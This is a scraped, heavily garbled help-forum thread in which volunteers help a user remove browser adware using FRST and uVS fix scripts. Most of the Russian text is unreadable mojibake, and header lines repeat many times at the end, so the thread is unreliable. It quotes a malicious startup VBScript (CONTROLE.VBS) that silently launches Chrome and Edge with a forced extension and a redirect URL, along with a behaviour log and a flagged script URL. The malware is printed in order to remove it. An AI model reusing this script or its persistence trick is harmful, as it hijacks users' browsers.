�� esetnod32.ru [��: �� . �� .]

�� . �� .

Fri, 19 Aug 2022 15:31:37 +0300

�� . �� . � �� .

====quote====
Kot Obormot ��:
��
=============

� �� ESET �� - �� . :)
�� - Kasper.
19.08.2022 15:31:37, RP55 RP55.

�� . �� .

Fri, 19 Aug 2022 14:44:00 +0300

�� . �� . � �� .
�� ! �� . �� . � �� , �� -�� , �� (�� , �� ). � �� . �� , �� , ��, �� VPN?
19.08.2022 14:44:00, Kot Obormot.

�� . �� .

Thu, 18 Aug 2022 23:04:29 +0300

�� . �� . � �� .

====quote====
Kot Obormot ��:
1) ��, ��, �� , �� - �� ? �� -�� (��, �� ), �� , �� ? (�� ?)
=============

�� - �� ( �� -�� )
�� \�� .
�� ( �� ) �� .

�� - �� - �� . ( �� - �� - �� ( �.�. �� ) )

====quote====
Kot Obormot ��:
2) �� ?) � �� , �� ? � �� password manager �� .
=============

�� - ��. �� , �� .
�� ?
�� ... �� 100 �� . ( �� ).
� �� - �� .
+
�� - �� .
---------------

�� : �� https://www.virustotal.com/gui/home/url
�� url

---------------
�� - �.�. �� ...

�.�. Mozilla Firefox ( � �� ) �� _�� .
�\�� : https://www.comss.ru/list.php?c=browsers
---------------
+
�� : http://pchelpforum.ru/f26/t141222/
18.08.2022 23:04:29, RP55 RP55.

�� . �� .

Thu, 18 Aug 2022 20:14:15 +0300

�� . �� . � �� .
�� . �� . �� mozila firefox �� .
�� . �� (�� ). ��-�� , �� , �� firefox � �� .

��: ��
��: DESKTOP-DKCSHOQ\e8921
�� : ��
�� : firefox.exe
�� : C:\Program Files (x86)\Mozilla Firefox
��: ��-��
�� : ��
��: ��
��: https://s3.amazonaws.com/publicjs/21b344a7264ba4c14a.js
�� : ��
�� : ��-��
�� : 21b344a7264ba4c14a.js
�� : https://s3.amazonaws.com/publicjs
��: ��
18.08.2022 20:14:15, Kot Obormot.

�� . �� .

Thu, 18 Aug 2022 20:00:20 +0300

�� . �� . � �� .
��, �� ! � �� (50 GB) �� , �� ) �� (�� ) shift+delete+enter.

� ��, � �� , �� , �� , �� -�� (��, ��, �� ). �� !

1) ��, ��, �� , �� - �� ? �� -�� (��, �� ), �� , �� ? (�� ?)

2) �� ?) � �� , �� ? � �� password manager �� .
18.08.2022 20:00:20, Kot Obormot.

�� . �� .

Thu, 18 Aug 2022 19:43:34 +0300

�� . �� . � �� .

====quote====
Kot Obormot ��:
� �� , �� ? (� �� , �� )?
=============
------------
�� , �� \�� - �, � �� .
�� ...
�� .

�� C:\Users\e8921\Downloads
�� .
18.08.2022 19:43:34, RP55 RP55.

�� . �� .

Thu, 18 Aug 2022 19:40:22 +0300

�� . �� . � �� .
� �� , �� ? (� �� , �� )? �� - �� downloads, �� ?
18.08.2022 19:40:22, Kot Obormot.

�� . �� .

Thu, 18 Aug 2022 19:38:17 +0300

�� . �� . � �� .
�� : � C:\Users\e8921\Downloads ( �� )
�� .
-----------
�� - ��, �� .
18.08.2022 19:38:17, RP55 RP55.

�� . �� .

Thu, 18 Aug 2022 19:23:34 +0300

�� . �� . � �� .
��, ��. �� "clean"?)
��_��.zip
18.08.2022 19:23:34, Kot Obormot.

�� . �� .

Thu, 18 Aug 2022 19:14:02 +0300

�� . �� . � �� .

====quote====
Kot Obormot ��:
� �� Malware related fixes?
=============
�� ( �� ) �� .
��:
�� ( �� Temp ) - ��
�� .
� �.�. - �� .
------------
�� - ��. ( �� ) � �� .
18.08.2022 19:14:02, RP55 RP55.

�� . �� .

Thu, 18 Aug 2022 18:54:11 +0300

�� . �� . � �� .
�� !

�� ! �� -�� ?
�� , �� . �� , �� , �� . � �� Malware related fixes?
18.08.2022 18:54:11, Kot Obormot.

�� . �� .

Thu, 18 Aug 2022 18:40:19 +0300

�� . �� . � �� .
�� : https://www.comss.ru/page.php?id=2421
��... �� - �� .
�� - �� . ( �� Ѩ �� :) )
+
�� ( �� ) ( �� - �� )
� �� ( �� :) ) - �� .
18.08.2022 18:40:19, RP55 RP55.

�� . �� .

Thu, 18 Aug 2022 18:11:25 +0300

�� . �� . � �� .
��, �� , �� -�� ))) � autoruns �� , �� ) .arn ��

�� . ��, �� , �� - �� ?)

��, �� , �� . �� 0 ��!

malware.txt
autoruns_log.txt
��_��.txt
18.08.2022 18:11:25, Kot Obormot.

�� . �� .

Thu, 18 Aug 2022 17:36:29 +0300

�� . �� . � �� .
�� Malwarebytes ( Kasper - �� Malwarebytes - �� )
http://forum.esetnod32.ru/forum9/topic10688/

�� : �� .
�� ( � �� ).
�� .txt ( �� )

+
�� Autoruns ( �� )
https://safezone.cc/threads/kak-podgotovit-log-autoruns.30173/
18.08.2022 17:36:29, RP55 RP55.

�� . �� .

Thu, 18 Aug 2022 17:26:57 +0300

�� . �� . � �� .
��. �� uvS �� (��, �� ), �� !
Fixlog.txt
18.08.2022 17:26:57, Kot Obormot.

�� . �� .

Thu, 18 Aug 2022 16:32:58 +0300

�� . �� . � �� .
1) �� : fixlist.txt � �� Farbar Recovery Scan Tool:

�� FRST � �� Fix � ��.

�� FRST �� -�� (Fixlog.txt). ��, �� !

2) �� - � �� .
uVS: start.exe, �� , ��, �� - �� .
�� , �� !
�� : �� !

====code====

;uVS v4.11.12 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
deltmp
restart
;---------command-block---------
delref {159FF5D5-55F1-4D2F-B706-767A55F77ABB}\[CLSID]
delref {1DAC0C53-7D23-4AB3-856A-B04D98CD982A}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\BITDEFENDER\BITDEFENDER SECURITY\BDWTEFF.XPI
delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY TOTAL SECURITY 21.3\FFEXT\LIGHT_PLUGIN_FIREFOX\ADDON.XPI
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\BITDEFENDER\SETUPINFORMATION\CL-26-A25B50FF-7E42-4637-AA3A-4C71F23F8B3A\SETUPLAUNCHER.EXE
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\XA43K758.DEFAULT\EXTENSIONS\VB@YANDEX.RU.XPI
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\XA43K758.DEFAULT\EXTENSIONS\SOVETNIK@METABAR.RU.XPI
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.165.21\PSMACHINE_64.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\IGDLH64.INF_AMD64_2681FC9DEDD95CD9\IGFXEXPS32.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.165.21\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\NVDECMFTMJPEG.DLL
delref D:\CHROME PORTABLE\GOOGLECHROMEPORTABLE64\APP\CHROME-BIN\CHROME.EXE
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\ACESTREAM\PLAYER\NPACE_PLUGIN.DLL
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\ACESTREAM\EXTENSIONS\AWE\FIREFOX\ACEWEBEXTENSION_UNLISTED.XPI
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE
delref D:\CHROME PORTABLE\GOOGLECHROMEPORTABLE64\APP\CHROME-BIN\CHROME_PROXY.EXE
delref CLIENTS2.GOOGLE.COM
delref %SystemDrive%\USERS\E8921\\LOCAL SETTINGS\APPLICATION DATA\YANDEX\YANDEXBROWSER\USER DATA\DEFAULT\EXTENSIONS\HELPER@SAVEFROM.NET.CRX
delall %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\XA43K758.DEFAULT\EXTENSIONS\SOVETNIK-YANDEX@YANDEX.RU.XPI
apply

=============
fixlist.txt
18.08.2022 16:32:58, RP55 RP55.

�� . �� .

Thu, 18 Aug 2022 15:24:38 +0300

�� . �� . � �� .
��. � �� , �� .

� �� , �� )
FRST.txt
Addition.txt
DESKTOP-DKCSHOQ_2022-08-18_15-20-01_v4.12.7z
18.08.2022 15:24:38, Kot Obormot.

�� . �� .

Thu, 18 Aug 2022 13:46:54 +0300

�� . �� . � �� .
Kot Obormot

� �� 900
�� 200 ( �� ) ��.
� �� 130 �� ...
--------
�� uVS
� �� FRST
�� ... ��.
18.08.2022 13:46:54, RP55 RP55.

�� . �� .

Thu, 18 Aug 2022 12:58:37 +0300

�� . �� . � �� .
��! �� . �� Chrome ��, �� "��", �� 10-15% �� . �� , � �� . �� 1 �� , � �� 10 �� , �� controle.vbs. �� (((
18.08.2022 12:58:37, Kot Obormot.

�� . �� .

Wed, 17 Aug 2022 18:31:36 +0300

�� . �� . � �� .
+
�� \�� .
https://forum.esetnod32.ru/forum8/topic15785/
17.08.2022 18:31:36, RP55 RP55.

�� . �� .

Wed, 17 Aug 2022 18:26:39 +0300

�� . �� . � �� .

====quote====
Kot Obormot ��:
P.S. �� , ��, �� ... ��
=============

�� V.T � ��: Behavior �� .

====code====

1988 - c:/windows/system32/cscript.exe Controle.vbs
2264 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog https://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000
2312 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --type=crashpad-handler --user-data-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Crashpad --metrics-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=83.0.4103.97 --initial-client-data=0x18c,0x190,0x194,0x160,0x198,0x7feeaedbd28,0x7feeaedbd38,0x7feeaedbd48

=============
17.08.2022 18:26:39, RP55 RP55.

�� . �� .

Wed, 17 Aug 2022 18:25:40 +0300

�� . �� . � �� .
� ��, �� , �� , �� )

17.08.2022 18:25:40, Kot Obormot.

�� . �� .

Wed, 17 Aug 2022 18:21:10 +0300

�� . �� . � �� .
�� ! � �� , �� vbs � ��) ��, �� . ��, �� , �� , �� , � �� virustotal � �� )

P.S. �� , ��, �� ... ��
� �� -�� )
17.08.2022 18:21:10, Kot Obormot.

�� . �� .

Wed, 17 Aug 2022 18:10:23 +0300

�� . �� . � �� .
+
� �� ( CONTROLE.VBS ) > �� -�� - � �� :)
17.08.2022 18:10:23, RP55 RP55.

�� . �� .

Wed, 17 Aug 2022 17:45:17 +0300

�� . �� . � �� .
�� C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\CONTROLE.VBS
�� CONTROLE.VBS
��. �� ?��? ��

www.virustotal.com 2022-02-17 20:18 [2021-04-06] �� .

��
��
�� 649 ��
�� 01.04.2021 � 22:38:31
�� 25.03.2021 � 17:20:04
��. ��

��. ��
SHA1 58367B32AAE4C92208268A1F4B50E37862FC0162
MD5 0278DC59F174789C3D2AA24DD835FD3A

#FILE# On Error Resume Next

Dim WShell
Set WShell = CreateObject("WScript.Shell")

WShell.Run "chrome.exe --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog ????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000", 0
WShell.Run "msedge.exe --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog ????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000", 0

Set WShell = Nothing

On Error Goto 0

��
�� C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP
---------------
�� 2021-04-06
� V.T. ��, �� .
https://www.virustotal.com/gui/file/dd438f4ed90e30e4ed4897937390ef0a9507b88f03eac2a323a00fb456420162?nocache=1
-----------------
�� CONTROLE.VBS
�� - � �� .
uVS: start.exe, �� , ��, �� - �� .
�� , �� !
�� : �� !

====code====


;uVS v4.11.12 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
;---------command-block---------
delall %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\CONTROLE.VBS
apply

restart

=============
17.08.2022 17:45:17, RP55 RP55.

�� . �� .

Wed, 17 Aug 2022 17:26:17 +0300

�� . �� . � �� .
� �� Microsoft Edge �� . �� windows ��-�� Microsoft Edge, �� ? (�� ).

� �� , �� (�� , �� ). �� , �� .

�� windows �� (�� ).

�� , �� - �� . ��, �� . � �� (�� ). ��

�� (�� ) �� ). �� vonrole.vbs �� -�� , � � �� ) �� - �� ) ��, �� , �� , �� ?)

17.08.2022 17:26:17, Kot Obormot.

�� . �� .

Wed, 17 Aug 2022 02:40:36 +0300

�� . �� . � �� .
��, ��, �� ! �� , �� seokistore � Microsoft Edge ��. �� , �� , � �� . � �� (�� seokistore). �� , �� )
17.08.2022 02:40:36, Kot Obormot.

�� . �� .

Wed, 17 Aug 2022 02:21:29 +0300

�� . �� . � �� .
� �� : �� .
� �� .
-------------
�� Autoruns https://www.comss.ru/page.php?id=1064
�� _???_ �� [v] � �� ... � �� - �� . ( �� )
+ �� ...
�� -�� - �� . :)
17.08.2022 02:21:29, RP55 RP55.

�� . �� .

Wed, 17 Aug 2022 02:08:55 +0300

�� . �� . � �� .
� �� -�� , �� Microsoft Edge? � � �� CCleaner �� , �� . �� Microsoft Edge. � �� . �� -�� ?)

P.S. �� , �� .

��, �� (� �� ) �� , �� , ��
17.08.2022 02:08:55, Kot Obormot.

�� . �� .

Wed, 17 Aug 2022 02:03:23 +0300

�� . �� . � �� .
��, �� , �� , ��
17.08.2022 02:03:23, Kot Obormot.

����� esetnod32.ru [����: ���������� �����. ������������� ������������� ����� � �����.]

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

���������� �����. ������������� ������������� ����� � �����.

�� esetnod32.ru [��: �� . �� .]

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .

�� . �� .